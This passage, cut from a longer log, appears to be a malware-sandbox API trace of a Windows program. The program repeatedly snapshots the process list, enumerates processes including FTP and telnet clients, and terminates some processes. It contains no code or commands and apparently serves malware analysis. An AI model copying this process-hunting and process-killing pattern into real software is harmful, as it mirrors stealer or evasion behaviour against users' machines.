lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0060.923] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0060.924] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0060.925] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0060.925] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0063.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0063.794] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.427] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.513] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.677] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.951] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.124] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.308] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System 
Process]")) returned 1 [0065.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.804] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.906] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf0 | out: lppe=0x292fdf0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.004] TerminateProcess (hProcess=0x178, uExitCode=0x0) returned 1 [0066.131] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.135] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.245] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.250] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.343] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.427] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.432] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.543] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.674] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.774] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.868] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.949] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0067.795] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0067.870] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0068.504] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0068.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0068.981] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0069.269] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0069.682] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0071.928] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.046] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0072.051] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0072.799] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0072.877] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.554] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0073.559] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0073.641] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0073.705] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0074.204] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0074.615] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0074.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0074.881] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0075.201] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf0 | out: lppe=0x292fdf0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.276] TerminateProcess (hProcess=0x170, uExitCode=0x0) returned 1 [0075.572] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0075.576] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0075.868] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0076.994] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0077.391] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0077.706] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0077.999] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.150] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.476] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.480] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.672] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System 
Process]")) returned 1 [0079.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0079.916] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.202] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.448] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.698] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0080.884] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf0 | out: lppe=0x292fdf0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.979] TerminateProcess (hProcess=0x16c, uExitCode=0x0) returned 1 [0081.059] CreateToolhelp32Snapshot 
(dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.067] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.259] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.478] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.663] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0081.900] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.152] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.338] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.585] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.588] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0082.832] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.005] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.209] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.442] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0083.733] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0084.006] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 